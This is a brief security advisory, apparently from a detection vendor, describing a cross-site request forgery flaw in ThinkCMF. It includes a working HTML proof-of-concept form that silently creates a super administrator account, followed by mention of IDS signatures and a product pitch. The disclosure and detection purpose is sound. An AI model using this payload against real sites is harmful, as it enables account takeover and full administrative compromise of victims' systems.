ThinkCMF is a content management framework built on the ThinkPHP+MYSQL combination.
ThinkCMF is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input.
By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to add a super admin user to the system. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.
<html> <body> <h1>CSRF - SuperAdmin User Creation</h1> <script>history.pushState('', '', '/')</script> <form action="http://localhost/admin/user/addpost.html" method="POST"> <input type="hidden" name="user_login" value="SuperAdmin" /> <input type="hidden" name="user_pass" value="SuperAdmin999qweasd" /> <input type="hidden" name="user_email" value="firstname.lastname@example.org" /> <input type="hidden" name="role_id" value="2" /> <input type="hidden" name="role_id" value="1" /> <input type="submit" value="Submit request" /> </form> <script> //document.forms.submit(); </script> </body> </html>
By turning this vulnerability into traffic files and matching rules, we are able to detect attempts to create a super admin user via CSRF.
Idappcom has created signatures 8023370 and 8023371 along with traffic files.
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional